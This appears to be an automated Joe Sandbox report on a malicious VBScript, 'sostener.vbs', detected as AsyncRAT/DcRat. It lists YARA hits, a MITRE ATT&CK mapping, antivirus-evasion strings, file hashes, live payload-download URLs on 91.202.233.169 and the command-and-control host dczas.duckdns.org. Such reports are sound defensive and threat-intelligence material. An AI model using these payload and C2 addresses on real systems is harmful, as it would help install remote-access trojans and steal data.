            Source: RegSvcs.exe, 00000004.00000002.2959693552.00000000031E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2959693552.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2959693552.000000000320D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\^q&
            Source: RegSvcs.exe, 00000004.00000002.2959693552.00000000031E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe^q|
            Source: RegSvcs.exe, 00000004.00000002.2959693552.00000000031EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\^qPaste_bin@\^q
            Source: RegSvcs.exe, 00000004.00000002.2959693552.000000000320D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe^qL
            Source: RegSvcs.exe, 00000004.00000002.2959693552.000000000320D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe^q,
            Source: RegSvcs.exe, 00000004.00000002.2959693552.00000000031E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2959693552.00000000031DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe^q
            Source: RegSvcs.exe, 00000004.00000002.2959693552.00000000031EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`,^q
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Yara detected AsyncRAT
            Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.powershell.exe.18504e7a558.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6884, type: MEMORYSTR
            Source: powershell.exe, 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: MSASCui.exe
            Source: powershell.exe, 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: procexp.exe
            Source: RegSvcs.exe, 00000004.00000002.2967904859.00000000056AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: powershell.exe, 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected DcRat
            Source: Yara matchFile source: 00000004.00000002.2959693552.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6884, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected DcRat
            Source: Yara matchFile source: 00000004.00000002.2959693552.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6884, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information221
            Scripting            		Valid Accounts1
            Windows Management Instrumentation            		1
            Scheduled Task/Job            		212
            Process Injection            		1
            Disable or Modify Tools            		OS Credential Dumping121
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Command and Scripting Interpreter            		221
            Scripting            		1
            Scheduled Task/Job            		21
            Virtualization/Sandbox Evasion            		LSASS Memory2
            Process Discovery            		Remote Desktop ProtocolData from Removable Media1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		212
            Process Injection            		Security Account Manager21
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Native API            		Login HookLogin Hook121
            Obfuscated Files or Information            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud Accounts1
            Exploitation for Client Execution            		Network Logon ScriptNetwork Logon Script2
            Software Packing            		LSA Secrets1
            File and Directory Discovery            		SSHKeylogging22
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable Media2
            PowerShell            		RC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            dczas.duckdns.org9%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://go.micro0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://aka.ms/pscore680%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
            http://91.202.233.1699%VirustotalBrowse
            https://github.com/Pester/Pester1%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            dczas.duckdns.org
            		89.117.23.22
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            )8"zctrue
              		unknown
              http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txttrue
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://91.202.233.169/Tak/Reg/Marz/Expowershell.exe, 00000003.00000002.1690160988.0000018506223000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1690160988.00000185062A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1703372117.0000018514A31000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1690160988.0000018504BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3Pe.txtpowershell.exe, 00000003.00000002.1690160988.0000018504D6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.0000018505FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1690160988.0000018504BE1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    http://91.202.Hpowershell.exe, 00000003.00000002.1690160988.00000185058B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.0000018505FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      https://go.micropowershell.exe, 00000003.00000002.1690160988.00000185058B8000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contoso.com/powershell.exe, 00000003.00000002.1703372117.0000018514A31000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1690160988.00000185062A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1703372117.0000018514A31000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contoso.com/Licensepowershell.exe, 00000003.00000002.1703372117.0000018514A31000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://91.202.233.169powershell.exe, 00000003.00000002.1690160988.0000018504BE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.0000018506223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.00000185058B8000.00000004.00000800.00020000.00000000.sdmptrueunknown
                      https://contoso.com/Iconpowershell.exe, 00000003.00000002.1703372117.0000018514A31000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://91.202.233.169/Tak/Reg/Marz/DRG/Rpowershell.exe, 00000003.00000002.1690160988.0000018505FD7000.00000004.00000800.00020000.00000000.sdmptrue
                        		unknown
                        HTTP://91.202.233.169/TAK/REG/MARZ/ENVS/DJ1.TXTpowershell.exe, 00000003.00000002.1690160988.0000018506223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.0000018504D6C000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          https://aka.ms/pscore68powershell.exe, 00000001.00000002.1721844392.000002244562B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1721844392.0000022445642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.00000185049C1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://91.202.233.169/Tak/Reg/Marz/ENVS/DJ1.txtpowershell.exe, 00000003.00000002.1690160988.0000018506223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.0000018504D6C000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1721844392.000002244566F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.00000185049C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2959693552.0000000003181000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1690160988.0000018504BE1000.00000004.00000800.00020000.00000000.sdmpfalseunknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            91.202.233.169
                            		unknownRussian Federation
                            		9009M247GBtrue
                            89.117.23.22
                            		dczas.duckdns.orgLithuania
                            		15419LRTC-ASLTtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1523124
                            Start date and time:2024-10-01 06:29:05 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 5m 4s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:10
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:sostener.vbs
                            Detection:MAL
                            Classification:mal100.troj.expl.evad.winVBS@8/5@7/2
                            EGA Information:
                            • Successful, ratio: 66.7%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 15
                            • Number of non-executed functions: 2
                            Cookbook Comments:
                            • Found application associated with file extension: .vbs

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target powershell.exe, PID 3848 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            00:29:55API Interceptor18x Sleep call for process: powershell.exe modified
                            00:30:19API Interceptor1x Sleep call for process: RegSvcs.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            91.202.233.169sostener.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                            • 91.202.233.169/Tak/Reg/Marz/ENVS/DJ1.txt
                            sostener.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                            • 91.202.233.169/Tak/Reg/Marz/ENVS/DS1.txt
                            sostener.vbsGet hashmaliciousRemcosBrowse
                            • 91.202.233.169/Tak/Reg/Marz/SH/Rcm.txt
                            sostener.vbsGet hashmaliciousRemcosBrowse
                            • 91.202.233.169/Tak/Reg/Marz/ZQWER/PeF3Dir.txt
                            envifa.vbsGet hashmaliciousRemcosBrowse
                            • 91.202.233.169/Tak/Reg/Marz/ZQWER/PeF3Dir.txt
                            89.117.23.22172771704470d2405c797286a7d66ed6085690f2346b0873f84a2d4bbbbfed17373d12cd4f758.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                              sostener.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                1726981024eaba256966e5d64020ad74d345ce2969fae5805b304862945360330900888386844.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                  decode_ba297ca42bf569929d6fafd20a8ed9212b3012291d38a6ec2be3376d5488c4a5.exeGet hashmaliciousRemcosBrowse
                                    decode_43048329e6cd6df3e144e8592c1194cf0da5e9113653ea155e664cbcc08b4b27.exeGet hashmaliciousAsyncRATBrowse
                                      1712325245721159bca57d1b66796bd3ddc0e68293cb290af6bbd263878d0bd09c0ee48caa758.dat-decoded.exeGet hashmaliciousNjratBrowse
                                        1712325245dd14de5ce8bd608ab9ed54b1036ba8bc99d838c1ed6d3361c8ac2ed8ec3c75ba394.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                          1712325246e9ef467ca10a8bb47cc22f360faab318b2059a09a5a7d0c76937a79cfb2a74b2831.dat-decoded.exeGet hashmaliciousRemcosBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            dczas.duckdns.org172771704470d2405c797286a7d66ed6085690f2346b0873f84a2d4bbbbfed17373d12cd4f758.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                            • 89.117.23.22
                                            sostener.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                            • 89.117.23.22

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            M247GBhttps://u47113775.ct.sendgrid.net/ls/click?upn=u001.NLjCc2NrF5-2Fl1RHefgLH74dDCI-2FlQUMQCuknF0akr34-3DPZ74_Bz-2FoIC9YMuvgy8ZsoekpZ-2Fn96y0OCAueT5LjwQn-2FX25AbFWdd2iGOJMfOUDymLwSDnjLWUuKOfyExMHrLPQc6sWuvBEF4PT9PwlcB-2BK9NQmoQucfLOeGSzPQg4J-2Bvn2C-2FT7DBGI3L6HQml9TPdefbzANw58o8IwtiN3AMNw21dRhcIy1JE5InQL6ZhzyniB-2FPrKB2Vn9uUJ7Mm1QrvUZh95-2FIqg1tkHnn-2FLCgLCOHUCdp1zwu5x-2Fprfv3kPHwI33RA9-2FJGY9xYPl-2BGH4uHP30vXeaFOwuVkWjx1bpQcAiato1uxhbL8AJAqpgT-2Bg5yQp7xXBACsCORIJr0VehkYFdFdFkgZPx7KSQblwloMm5OUc-2B9bb1d0siCBq5u36Pp2iCgmhq5PmipxmWr1HvrLZkdUUXJjpaRdjjEopb-2Fhw3b-2BUOpmNbUIJywjWyMBcUA9ScKtkpotTga2qo5ZaX-2B7AVyqz8KXtUfTb8SopobzuOWPiU-2BhBa8i7lRIGGQBQZmYU1TWv5mQ8uRPPf-2FWdH9RREF8cMLDET4k24yu8dJdqteeATx8Jfw8MWOWehX6ZTxJWGswooAVOvW116fDJmFNO-2F-2BecR-2Fd9NmRwCYnnK4Bh3IM-3DGet hashmaliciousHTMLPhisherBrowse
                                            • 172.86.79.8
                                            1bhYyrjyNk.vbsGet hashmaliciousUnknownBrowse
                                            • 172.86.98.166
                                            WQRNV7bMS5.vbsGet hashmaliciousUnknownBrowse
                                            • 172.86.98.166
                                            6L9vCf48mN.vbsGet hashmaliciousUnknownBrowse
                                            • 172.86.98.166
                                            sostener.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                            • 91.202.233.169
                                            https://timetraveltv.com/actions/cart_update.php?currency=GBP&return_url=https://blog.acelyaokcu.com/m/?c3Y9bzM2NV8xX29uZSZyYW5kPVdrcFNRMHM9JnVpZD1VU0VSMDkwOTIwMjRVMTIwOTA5MDE=N0123N%5BEMAILGet hashmaliciousUnknownBrowse
                                            • 195.8.197.149
                                            C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                            • 89.238.176.21
                                            file.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 172.111.244.109
                                            New_Order-Rquest_Quotation_Specifications_Drawings_Samplespdf.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 172.111.244.109
                                            PO-2609202412666 PNG2023-W101_pdf.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 172.111.244.109
                                            LRTC-ASLT172771704470d2405c797286a7d66ed6085690f2346b0873f84a2d4bbbbfed17373d12cd4f758.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                            • 89.117.23.22
                                            sostener.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                            • 89.117.23.22
                                            mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 89.117.23.69
                                            shelld.x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 89.117.23.69
                                            ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 89.117.23.69
                                            arm61.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 89.117.23.69
                                            sh4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 89.117.23.69
                                            586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 89.117.23.69
                                            dss.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 89.117.23.69
                                            mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 89.117.23.69

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):0.773832331134527
                                            Encrypted:false
                                            SSDEEP:3:NlllulI:NllU
                                            MD5:132C26A05F791EF716632B05AFDD4127
                                            SHA1:36CABE22E212DA474C7CFA2BE6EA2FDDA847B26C
                                            SHA-256:D91AC8ABA939D15BFA7B1138AF2203B931BD05180CE599FDA34F26B06BD14044
                                            SHA-512:4D80C1BD6BCC1358A59C1056CA12026752EAF29CD7014B6D0ABF1228CDAF042A573344C002937EE218701055B7824A6ED6F1E1394188A86AD468060040BBC7A4
                                            Malicious:false
                                            Reputation:low
                                            Preview:@...e.................................6.S.......................

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3tt2wolv.5lp.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0ugkguh.4gx.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wmyv2swh.v3z.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yxbjuoro.p31.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            Static File Info

                                            General

                                            File type:Unicode text, UTF-16, little-endian text, with very long lines (10001), with CRLF line terminators
                                            Entropy (8bit):4.47118382587944
                                            TrID:
                                            • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                                            • MP3 audio (1001/1) 33.33%
                                            File name:sostener.vbs
                                            File size:1'977'486 bytes
                                            MD5:640864bd8dcc33f7191cea6e8794a386
